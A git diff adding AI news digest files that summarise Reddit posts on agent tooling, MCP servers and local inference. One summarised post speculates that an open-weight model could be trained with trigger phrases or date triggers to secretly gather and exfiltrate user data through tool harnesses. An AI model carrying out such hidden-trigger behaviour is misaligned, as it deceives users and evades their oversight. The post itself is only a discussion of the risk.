api_update, developer_tool + +> I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated? 
+ +--- + +## [Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]](https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/) +*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off… + +--- + +## [I’m building an open-source decision layer above AI agents [P]](https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/) +*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. 
Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning… + +--- + +## [I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the "rm -rf /" risk](https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> I've been working with agents for months now, and I haven't found a sandbox environment that "just works" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. 
Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO… + +--- + +## [We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro](https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. 
Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case. + +--- + +## [xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss](https://www.digg.com/ai/hlcz47lw) +*Digg AI* | Score: 1.00 +Tags: product_launch, cli_tool + +--- + +## [Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead](https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\_npu dependency on the hot path. 
Python is only used on the cold path for CPU-side tokenization and image preproces… + +--- + +## [I shipped a windows desktop app for running local LLMs with a button that turns your "no thats wrong" into actual LoRA training data](https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going "no thats not what i meant". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi… + +--- + +## [Could Open Models be trained to secretly go rogue?](https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> I was discussing with some other folks how safe is to use open weights models from China and the topic of "trojan horse" came up. 
We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote "switch" that would change its behavior or inject a different prompt. But would there be any other ways to "execute order 66" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). Thoughts? + +--- + +## [I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.](https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/) +*Reddit r/ChatGPT* | 25/05/2026 | Score: 0.94 +Tags: api_update, developer_tool + +> I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. 
Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. The chat gets saved in the Dichrome proj… + +--- + diff --git a/data/digest-2026-05-26.md b/data/digest-2026-05-26.md new file mode 100644 index 0000000..4983559 --- /dev/null +++ b/data/digest-2026-05-26.md @@ -0,0 +1,121 @@ +# Stack Scout - AI News Digest +**2026-05-26** | 15 stories | Auto-generated from 541 archived stories + +--- + +## [open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary](https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source, developer_tool + +> last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred "make sure the branch is clean" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure ("if the agent calls X, the trace must satisfy Y"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express "tests must pass before commit", "no two writes to the same file in a session", or "max N file edits per session", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. hard guarantees have to live outside the probabilistic part of the system. 
how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa… + +--- + +## [Built an MCP server so Claude can generate music, images, and video natively. One config block.](https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \- aw\_generate\_music (Suno, full songs with lyrics or instrumental) \- aw\_generate\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \- aw\_generate\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\~/.config/claude/mcp.json or wherever yours lives): { "mcpServers": { "aetherwave": { "command": "npx", "args": \["-y", "@aetherwave-studio/mcp"\], "env": { "AW\_API\_KEY": "aw\_live\_YOUR\_KEY\_HERE" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. 
"Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin… + +--- + +## [Small set of local MCP server installers for home Linux users](https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/) +*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \`/mcp\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. 
The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \`8001-80… + +--- + +## [Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode](https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/) +*Reddit r/LocalLLaMA* | 26/05/2026 | Score: 1.00 +Tags: product_launch, cli_tool, agent_tool + +> I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you! 
+ +--- + +## [This is insane.](https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every "context layer" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti… + +--- + +## [Find where claude code burns your tokens](https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 +Tags: api_update, developer_tool, cli_tool + +> I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. 
Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. Happy to answer technical doubts + +--- + +## [Anyone else dread keeping web, Android, and iOS releases in sync?](https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.86 +Tags: product_launch, cli_tool, tool_update + +> I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... 
I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \- bump the right versions/build numbers both in build and in game ui \- create patch notes for every supported language \- run lint/typecheck/build through \`npm run verify\` \- sync Capacitor after the web build \- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \- build an Android AAB and upload it to Google Play \-… + +--- + +## [Claude makes documents into apps](https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 0.70 +Tags: open_source, tool_update, agent_tool + +> # Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. # Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. 
The docume… + +--- + +## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks. It prevents enterprise cost overruns from overusing frontier models](https://www.digg.com/ai/5nn022fp?rank=3) +*Digg AI* | Score: 1.00 +Tags: api_update, product_launch + +--- + +## [Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks](https://www.digg.com/ai/5nn022fp) +*Digg AI* | Score: 1.00 +Tags: api_update, product_launch + +--- + +## [i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better](https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \~20% context saturation way too often, before doing any actual work. tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. 
repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on… + +--- + +## [I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.](https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. 
Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo… + +--- + +## [Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!](https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d… + +--- + +## [Finally tested an AI video tool that works directly in Claude without setup](https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/) +*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. 
Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi… + +--- + +## [Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event](https://x.com/Scobleizer/status/2057868124112982526) +*Aligned News (Scoble)* | 26/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event. 
+ +--- + diff --git a/data/digest-2026-05-27.md b/data/digest-2026-05-27.md new file mode 100644 index 0000000..b43798b --- /dev/null +++ b/data/digest-2026-05-27.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-27** | 15 stories | Auto-generated from 680 archived stories + +--- + +## [MarkdownAI v2.0, its a workflow engine, not a template parser](https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 +Tags: api_update, mcp, tool_update + +> MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl… + +--- + +## [I ran 8 open-weight models as agents in a persistent MMO for 10 days. 
Here's the 93k event dataset and some things that I learned](https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every "player" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d… + +--- + +## [Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.](https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, open_source, agent_tool + +> been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. 
what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = "atlas" default_model = "deepseek-ai/deepseek-v4-flash" [[ custom_providers ]] name = "atlas" base_url = "https://api.atlascloud.ai/v1" api_key_env = "ATLAS_API_KEY" model = "deepseek… + +--- + +## [I built a tool that lets your AI assistant test your entire app in a real browser](https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.94 +Tags: mcp, open_source, developer_tool + +> So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant "test the login flow" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 
12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing) + +--- + +## [Anthropic just confirmed why 90% of non-coding AI agents fail in production](https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet."* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. 
